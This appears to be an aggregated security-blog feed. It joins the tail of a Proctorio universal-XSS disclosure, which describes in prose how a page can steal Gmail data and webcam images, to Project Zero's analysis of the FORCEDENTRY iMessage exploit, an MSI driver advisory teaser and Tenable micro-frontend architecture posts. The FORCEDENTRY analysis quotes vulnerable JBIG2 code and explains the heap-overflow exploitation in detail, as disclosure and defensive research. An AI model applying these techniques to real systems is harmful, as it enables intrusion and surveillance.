With an Universal XSS vulnerability a malicious webpage can run JavaScript on other pages, regardless of the origin. This makes this a very powerful primitive for an attacker to have in a browser. The video below shows that we can use this primitive to obtain a screenshot from the webcam and to download a GMail inbox, using our exploit from above.

For stealing GMail data we just need to inject some JavaScript that copies the content of the inbox and sends it to a server under our control. For getting a webcam screenshot we rely on the fact that most people will have allowed certain legitimate domains to have webcam access. In particular, users of Proctorio who had to enable their webcam for a test will have given the legitimate test website permission to use the webcam. We use UXSS to open a tab of such a domain and inject some JavaScript that grabs a webcam screenshot. In the example we rely on the fact that the victim has previously granted the domain zoom.us webcam access. This can be any page, but due to the pandemic we think that zoom.us would be a pretty safe bet. (The stuffed animal is called Dikkie Dik, from a well known Dutch children’s picture book.)

Disclosure

We contacted Proctorio with our findings on June 18th, 2021. They replied back within hours thanking us for our findings. Within a week (on June 25th) they reported that the vulnerability was fixed and a new version was pushed to the Google Chrome Web Store. We verified that the vulnerability was fixed on August 3rd. Since Google Chrome automatically updates installed extensions, this requires no further action from the end-user. At the time of writing version 1.4.21183.1 is the latest version.

In the fixed version, an iframe is used to load a webpage for the calculator, meaning exploiting this vulnerability is no longer possible.

Installing software on your (personal) device, either for work or for study always adds new risks end-users should be aware of. In general it is always wise to deinstall software as soon as you no longer need it, in order to mitigate this risk. In this situation one could disable the Proctorio plugin, to avoid it being accessible when you are not taking a test.

A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution

By: Ryan
15 December 2021 at 17:00

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.

Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.

The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860.

NSO

NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities.

For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products" Pegasus has been linked to the hacking of the New York Times journalist Ben Hubbard by the Saudi regime, hacking of human rights defenders in Morocco and Bahrain, the targeting of Amnesty International staff and dozens of other cases.

Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent."

Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out.

From One to Zero

In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages:

Screenshots of Phishing SMSs reported to Citizen Lab in 2016

source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn't need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.

One weird trick

The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username.

iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif:

  [IMGIFUtils copyGifFromPath:toDestinationPath:error]

Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file.

The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code.

Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor.

A PDF in your GIF

NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser.

PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...

Extreme compression

In the late 1990's, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain specific image codec designed to compress images where pixels can only be black or white.

It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the XEROX WorkCenter device shown below. If you used the scan to pdf functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.

A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2

for its scan-to-pdf functionality

source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications

The PDFs files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit:

Technique 1: Segmentation and substitution

Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:

Simple pattern matching can find all the shapes which look similar on a page,

in this case all the 'e's

JBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition.) A JBIG encoder is just looking for connected regions of pixels and grouping similar looking regions together. The compression algorithm is to simply substitute all sufficiently-similar looking regions with a copy of just one of them:

Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios

In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations.

There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore.

Technique 2: Refinement coding

As mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate "less lossy" compression mode.

It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle:

Using the XOR operator on bitmaps to compute a difference image

In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression.
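As a toy illustration of that round trip (a single made-up row of pixels, not the actual JBIG2 refinement code):

#include <cstdint>
#include <cstdio>

int main()
{
    uint8_t original    = 0b01101110;             // one row of the original glyph
    uint8_t substituted = 0b01101010;             // the same row of the reference glyph
    uint8_t diff        = original ^ substituted; // difference mask stored by the encoder
    uint8_t recovered   = substituted ^ diff;     // the decoder XORs the mask back in
    printf("recovered == original: %s\n", recovered == original ? "yes" : "no");
    return 0;
}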

Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas.

A JBIG2 stream

Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available.

The JBIG2 format is a series of segments, which can be thought of as a series of drawing commands which are executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types which include operations like defining a new page, decoding a huffman table or rendering a bitmap to given coordinates on the page.

Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict.

A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas.

A JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs.

JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially.

The vulnerability

The vulnerability is a classic integer overflow when collating referenced segments:

  Guint numSyms; // (1)
  numSyms = 0;
  for (i = 0; i < nRefSegs; ++i) {
    if ((seg = findSegment(refSegs[i]))) {
      if (seg->getType() == jbig2SegSymbolDict) {
        numSyms += ((JBIG2SymbolDict *)seg)->getSize();  // (2)
      } else if (seg->getType() == jbig2SegCodeTable) {
        codeTables->append(seg);
      }
    } else {
      error(errSyntaxError, getPos(),
            "Invalid segment reference in JBIG2 text region");
      delete codeTables;
      return;
    }
  }
...
  // get the symbol bitmaps
  syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)
  kk = 0;
  for (i = 0; i < nRefSegs; ++i) {
    if ((seg = findSegment(refSegs[i]))) {
      if (seg->getType() == jbig2SegSymbolDict) {
        symbolDict = (JBIG2SymbolDict *)seg;
        for (k = 0; k < symbolDict->getSize(); ++k) {
          syms[kk++] = symbolDict->getBitmap(k); // (4)
        }
      }
    }
  }

numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value.

That smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer.

Inside the inner-most loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer.
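To make the arithmetic concrete, here is a tiny standalone sketch (not Xpdf code, with made-up dictionary sizes) of how the 32-bit accumulation wraps while the copy loop still visits the real number of symbols:

#include <cstdint>
#include <cstdio>

int main()
{
    // Hypothetical sizes of two referenced symbol dictionaries whose sum exceeds 2^32.
    uint32_t numSyms = 0;      // Guint is a 32-bit unsigned integer
    numSyms += 0xFFFFFFF0u;    // getSize() of the first referenced JBIG2SymbolDict
    numSyms += 0x30u;          // getSize() of the second: the addition wraps around
    printf("numSyms after overflow: 0x%x\n", numSyms);                               // 0x20
    printf("allocation at (3): %u bytes\n", numSyms * (unsigned)sizeof(void *));     // 256 on 64-bit

    // The nested loop at (4) still iterates over every symbol of every dictionary,
    // i.e. the un-wrapped count, so pointer writes run far past the small buffer.
    uint64_t realSyms = 0xFFFFFFF0ull + 0x30ull;
    printf("pointers the loop would try to write: %llu\n", (unsigned long long)realSyms);
    return 0;
}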

Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegments routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4).

Conveniently, since JBIG2Bitmap inherits from JBIG2Segment the seg->getType() virtual call succeeds even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls), but the returned type will now not be equal to jbig2SegSymbolDict, causing further writes at (4) to not be reached and bounding the extent of the memory corruption.

A simplified view of the memory layout when the heap overflow occurs showing the undersized-buffer below the GList backing buffer and the JBIG2Bitmap

Boundless unbounding

Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to where current drawing commands render).

JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer’s width and height (in bits) as well as a line value which defines how many bytes are stored for each line.

The memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow

By carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers after the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. All iOS hardware is little endian, meaning that the w and line fields are likely to be overwritten with 0x1 (the most-significant half of a JBIG2Bitmap pointer) and the segNum and h fields with the least-significant half of such a pointer: a fairly random value, depending on heap layout and ASLR, somewhere between 0x100000 and 0xffffffff.

This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer.

The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields:


The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory

By rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer.

At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser?

My other compression format is turing-complete!

As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect.

In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets:

The memory layout showing how logical operators can be applied out-of-bounds

It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits?

You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory.

With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate:

An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1, creating a NAND gate.

A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function.
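To make that concrete, here is a small TypeScript sketch (purely illustrative, not part of the exploit) of NAND built from the available AND and XOR operations, with NOT and OR then rebuilt from NAND alone:

// Bit-valued gates corresponding to the operators available to JBIG2 refinement.
const AND = (a: number, b: number): number => a & b & 1;
const XOR = (a: number, b: number): number => (a ^ b) & 1;

// NAND: run AND first, then negate the result by XORing with the constant 1.
const NAND = (a: number, b: number): number => XOR(AND(a, b), 1);

// Everything else follows from NAND alone (De Morgan gives OR).
const NOT = (a: number): number => NAND(a, a);
const OR = (a: number, b: number): number => NAND(NOT(a), NOT(b));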

Practical circuits

JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.
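As a rough illustration of how arithmetic falls out of such gates, the sketch below (again illustrative only, nothing like the attacker's actual 70,000-segment circuit) chains one-bit full adders built from AND, OR and XOR into a ripple-carry adder:

// Bit-valued gates, as in the previous sketch.
const AND = (a: number, b: number): number => a & b & 1;
const OR = (a: number, b: number): number => (a | b) & 1;
const XOR = (a: number, b: number): number => (a ^ b) & 1;

// One-bit full adder expressed purely as logic gates.
function fullAdder(a: number, b: number, carryIn: number) {
  const sum = XOR(XOR(a, b), carryIn);
  const carryOut = OR(AND(a, b), AND(carryIn, XOR(a, b)));
  return { sum, carryOut };
}

// Ripple-carry adder over bit arrays, least-significant bit first.
function rippleAdd(a: number[], b: number[]): number[] {
  const out: number[] = [];
  let carry = 0;
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    const { sum, carryOut } = fullAdder(a[i] ?? 0, b[i] ?? 0, carry);
    out.push(sum);
    carry = carryOut;
  }
  out.push(carry);
  return out;
}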

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox.

Merry Hackmas: multiple vulnerabilities in MSI’s products

By: voidsec
16 December 2021 at 13:46

This blog post serves as an advisory for a couple of MSI’s products that are affected by multiple high-severity vulnerabilities in the driver components they ship with. All the vulnerabilities are triggered by sending specific IOCTL requests and allow an attacker to: Directly interact with physical memory via the MmMapIoSpace function call, mapping physical memory […]

The post Merry Hackmas: multiple vulnerabilities in MSI’s products appeared first on VoidSec.

1. Introduction: Our Journey Implementing a Micro Frontend

16 December 2021 at 17:08

Introduction: Our Journey Implementing a Micro Frontend

In the current world of frontend development, picking the right architecture and tech stack can be challenging. With all of the libraries, frameworks, and technologies available, it can seem (to say the least) overwhelming. Learning how other companies tackle a particular challenge is always beneficial to the community as a whole. Therefore, in this series, we hope to share the lessons we have learned in creating a successful micro-frontend architecture.

What This Series is About

While the term “micro-frontend” has been around for some time, the manner in which you build this type of architecture is ever evolving. New solutions and strategies are introduced all the time, and picking the one that is right for you can seem like an impossible task. This series focuses on creating a micro-frontend architecture by leveraging the NX framework and webpack’s module federation (released in webpack 5). We’ll detail each of our phases from start to finish, and document what we encountered along the way.

The series is broken up into the following articles:

  • Why We Implemented a Micro Frontend — Explains the discovery phase shown in the infographic above. It talks about where we started and, specifically, what our architecture used to look like and where the problems within that architecture existed. It then goes on to describe how we planned to solve our problems with a new architecture.
  • Introducing the Monorepo and NX — Documents the initial phase of updating our architecture, during which we created a monorepo built off the NX framework. This article focuses on how we leverage NX to identify which part of the repository changed, allowing us to only rebuild that portion.
  • Introducing Module Federation — Documents the next phase of updating our architecture, where we broke up our main application into a series of smaller applications using webpack’s module federation.
  • Module Federation — Managing Your Micro-Apps — Focuses on how we enhanced our initial approach to building and serving applications using module federation, namely by consolidating the related configurations and logic.
  • Module Federation — Sharing Vendor Code — Details the importance of sharing vendor library code between applications and some related best practices.
  • Module Federation — Sharing Library Code — Explains the importance of sharing custom library code between applications and some related best practices.
  • Building and Deploying — Documents the final phase of our new architecture where we built and deployed our application utilizing our new micro-frontend model.
  • Summary — Reviews everything we discussed and provides some key takeaways from this series.

Who is This For?

If you find yourself in any of the categories below, then this series is for you:

  • You’re an engineer just getting started, but you have a strong interest in architecture.
  • You’re a seasoned engineer managing an ever-growing codebase that keeps getting slower.
  • You’re a technical director and you’d like to see an alternative to how your teams work and ship their code.
  • You work with engineers on a daily basis, and you’d really like to understand what they mean when they say a micro-frontend.
  • You really just like to read!

In conclusion, read on if you want a better understanding of how you can successfully implement a micro-frontend architecture from start to finish.

How Articles are Structured

Each article in the series is split into two primary parts. The first half (overview, problem, and solution) gives you a high level understanding of the topic of discussion. If you just want to view the “cliff notes”, then these sections are for you.

The second half (diving deeper) is more technical in nature, and is geared towards those who wish to see how we actually implemented the solution. For most of the articles in this series, this section includes a corresponding demo repository that further demonstrates the concepts within the article.

Summary

So, let’s begin! Before we dive into how we updated our architecture, it’s important to discuss the issues we faced that led us to this decision. Check out the next article in the series to get started.


1. Introduction: Our Journey Implementing a Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

2. Why We Implemented A Micro Frontend

16 December 2021 at 17:11

Why We Implemented A Micro Frontend

This is post 2 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article documents the discovery phase of our journey toward a new architecture. Like any engineering group, we didn’t simply wake up one day and decide it would be fun to rewrite our entire architecture. Rather, we found ourselves with an application that was growing exponentially in size and complexity, and discovered that our existing architecture didn’t support this type of growth for a variety of reasons. Before we dive into how we revamped our architecture to fix these issues, let’s set the stage by outlining what our architecture used to look like and where the problems existed.

Our Initial Architecture

When one of our core applications (Tenable.io) was first built, it consisted of two separate repositories:

  • Design System Repository — This contained all the global components that were used by Tenable.io. For each iteration of a given component, it was published to a Nexus repository (our private npm repository) leveraging Lerna. Package versions were incremented following semver (ex. 1.0.0). Additionally, it also housed a static design system site, which was responsible for documenting the components and how they were to be used.
  • Tenable.io Repository — This contained a single page application built using webpack. The application itself pulled down components from the Nexus repository according to the version defined in the package.json.

This was a fairly traditional architecture and served us well for some time. Below is a simplified diagram of what this architecture looked like:

The Problem

As our application continued to grow, we created more teams to manage individual parts of the application. While this was beneficial in the sense that we were able to work at a quicker pace, it also led to a variety of issues.

Component Isolation

Due to global components living in their own repository, we began encountering an issue where components did not always work appropriately when they were integrated into the actual application. While developing a component in isolation is nice from a developmental standpoint, the reality is that the needs of an application are diverse, and typically this means that a component must be flexible enough to account for these needs. As a result, it becomes extremely difficult to determine if a component is going to work appropriately until you actually try to leverage it in your application.

Solution #1 — Global components should live in close proximity to the code leveraging those components. This ensures they are flexible enough to satisfy the needs of the engineers using them.

Component Bugs & Breaking Changes

We also encountered a scenario where a bug was introduced in a given component but was not found or realized until a later date. Since component updates were made in isolation within another repository, engineers working on the Tenable.io application would only pull in updated components when necessary. When this did occur, they were typically jumping between multiple versions at once (ex. 1.0.0 to 1.4.5). When the team discovered a bug, it may have been from one of the versions in between (ex. 1.2.2). Trying to backtrack and identify which particular version introduced the bug was a time-consuming process.

Solution #2 — Updates to global components should be tested in real time against the code leveraging those components. This ensures the updates are backwards compatible and non-breaking in nature.

One Team Blocks All Others

One of the most significant issues we faced from an architectural perspective was the blocking nature of our deployments. Even though a large number of teams worked on different areas of the application that were relatively isolated, if just one team introduced a breaking change it blocked all the other teams.

Solution #3 — Feature teams should move at their own pace, and their impact on one another should be limited as much as possible.

Slow Development

As we added more teams and more features to Tenable.io, the size of our application continued to grow, as demonstrated below.

If you’ve ever been the one responsible for managing the webpack build of your application, you’ll know that the bigger your application gets, the slower your build becomes. This is simply a result of having more code that must be compiled/re-compiled as engineers develop features. This not only impacted local development, but our Jenkins build was also getting slower over time, because it had to lint, test, and build more and more code as the application grew. We employed a number of solutions in an attempt to speed up our build, including the DllPlugin, the SplitChunksPlugin, tweaking our minification configuration, etc. However, we began realizing that at a certain point there wasn’t much more we could do, and we needed a better way to build out the different parts of the application (note: something like parallel-webpack could have helped here if we had gone down a different path).

Solution #4 — Engineers should be capable of building the application quickly for development purposes regardless of the size of the application as it grows over time. In addition, Jenkins should be capable of testing, linting, and building the application in a performant manner as the system grows.

The Solution

At a certain point, we decided that our architecture was not satisfying our needs. As a result, we made the decision to update it. Specifically, we believed that moving towards a monorepo based on a micro-frontend architecture would help us address these needs by offering the following benefits:

  • Monorepo — While definitions vary, in our case a monorepo is a single repository that houses multiple applications. Moving to a monorepo would entail consolidating the Design System and the Tenable.io repositories into one. By combining them into one repository, we can ensure that updates made to components are tested in real time by the code consuming them and that the components themselves are truly satisfying the needs of our engineers.
  • Micro-Frontend — As defined here, a “Micro-frontend architecture is a design approach in which a front-end app is decomposed into individual, semi-independent ‘microapps’ working loosely together.” For us, this means splitting apart the Tenable.io application into multiple micro-applications (we’ll use this term moving forward). Doing this allows teams to move at their own pace and limit their impact on one another. It also speeds up the time to build the application locally by allowing engineers to choose which micro applications to build and run.

Summary

With these things in mind, we began to develop a series of architectural diagrams and roadmaps that would enable us to move from point A to point B. Keep in mind, though, at this point we were dealing with an enterprise application that was in active development and in use by customers. For anyone who has ever been through this process, trying to revamp your architecture at this stage is somewhat akin to changing a tyre while driving.

As a result, we had to ensure that as we moved towards this new architecture, our impact on the normal development and deployment of the application was minimal. While there were plenty of bumps and bruises along the way, which we will share as we go, we were able to accomplish this through a series of phases. In the following articles, we will walk through these phases. See the next article to learn how we moved to a monorepo leveraging the NX framework.


2. Why We Implemented A Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

3. Introducing The Monorepo & NX

16 December 2021 at 17:11

Introducing The Monorepo & NX

This is post 3 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

In this next phase of our journey, we created a monorepo built off the NX framework. The focus of this article is on how we leverage NX to identify which part of the repository changed, allowing us to only rebuild that portion. As discussed in the previous article, our teams were plagued by a series of issues that we believed could be solved by moving towards a new architecture. Before we dive into the first phase of this new architecture, let’s recap one of the issues we were facing and how we solved it during this first phase.

The Problem

Our global components lived in an entirely different repository, where they had to be published and pulled down through a versioning system. To do this, we leveraged Lerna and Nexus, which is similar to how 3rd-party NPM packages are deployed and utilized. As a result of this model, we constantly dealt with issues pertaining to component isolation and breaking changes.

To address these issues, we wanted to consolidate the Design System and Tenable.io repositories into one. To ensure our monorepo would be fast and efficient, we also introduced the NX framework to only rebuild parts of the system that were impacted by a change.

The Solution

The Monorepo Is Born

The first step in updating our architecture was to bring the Design System into the Tenable.io repository. This involved the following:

  • Design System components — The components themselves were broken apart into a series of subdirectories that all lived under libs/design-system. In this way, they could live alongside our other Tenable.io specific libraries.
  • Design System website — The website (responsible for documenting the components) was moved to live alongside the Tenable.io application in a directory called apps/design-system.

The following diagram shows how we created the new monorepo based on these changes.

It’s important to note that at this point, we made a clear distinction between applications and libraries. This distinction is important because we wanted to ensure a clear import order: that is, we wanted applications to be able to consume libraries but never the other way around.

Leveraging NX

In addition to moving the design system, we also wanted the ability to only rebuild applications and libraries based on what was changed. In a monorepo where you may end up having a large number of applications and libraries, this type of functionality is critical to ensure your system doesn’t grow slower over time.

Let’s use an example to demonstrate the intended functionality: In our example, we have a component that is initially only imported by the Design System site. If an engineer changes that component, then we only want to rebuild the Design System because that’s the only place that was impacted by the change. However, if Tenable.io was leveraging that component as well, then both applications would need to be rebuilt. To manage this complexity, we rebuilt the repository using NX.

So what is NX? NX is a set of tools that enables you to separate your libraries and applications into what NX calls “workspaces”. Think of a workspace as an area in your repository (i.e. a directory) that houses shared code (an application, a utility library, a component library, etc.). Each workspace has a series of commands that can be run against it (build, serve, lint, test, etc.). This way when a workspace is changed, the nx affected command can be run to identify any other workspace that is impacted by the update. As demonstrated here, when we change Component A (living in the design-system/components workspace) and run the affected command, NX indicates that the following three workspaces are impacted by that change: design-system/components, Tenable.io, and Design System. This means that both the Tenable.io and Design System applications are importing that component.

This type of functionality is critical for a monorepo to work as it scales in size. Without this your automation server (Jenkins in our case) would grow slower over time because it would have to rebuild, re-lint, and re-test everything whenever a change was made. If you want to learn more about how NX works, please take a look at this write up that explains some of the above concepts in more detail.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how NX works and the way in which things can be set up. If you wish to see the code associated with the following section, you can check it out in this branch.

At this point, our repository looks something like the structure of defined workspaces below:

Apps

  • design-system — The static site (built off of Gatsby) that documents our global components.
  • tenable-io — Our core application that was already in the repository.

Libs

  • design-system/components — A library that houses our global components.
  • design-system/styles — A library that is responsible for setting up our global theme provider.
  • tenable-io/common — The pre-existing shared code that the Tenable.io application was leveraging and sharing throughout the application.

To reiterate, a workspace is simply a directory in your repository that houses shared code that you want to treat as either an application or a library. The difference here is that an application is standalone in nature and shows what your consumers see, whereas a library is something that is leveraged by n+ applications (your shared code). As shown below, each workspace can be configured with a series of targets (build, serve, lint, test) that can be run against it. This way, if a change has been made that impacts a workspace and we want to build all of them, we can tell NX to run the build target for all affected workspaces.
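The configuration itself appears in the original as a screenshot; the abbreviated sketch below shows the general shape of such a workspace definition (the executor names are common NX defaults of that era and are assumptions here, with options omitted):

{
  "version": 2,
  "projects": {
    "tenable-io": {
      "root": "apps/tenable-io",
      "sourceRoot": "apps/tenable-io/src",
      "projectType": "application",
      "targets": {
        "build": { "executor": "@nrwl/web:build", "options": {} },
        "serve": { "executor": "@nrwl/web:dev-server", "options": {} },
        "lint": { "executor": "@nrwl/linter:eslint", "options": {} },
        "test": { "executor": "@nrwl/jest:jest", "options": {} }
      }
    }
  }
}

With targets defined this way, running a command such as nx affected --target=build tells NX to run the build target for every workspace affected by the current changes.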

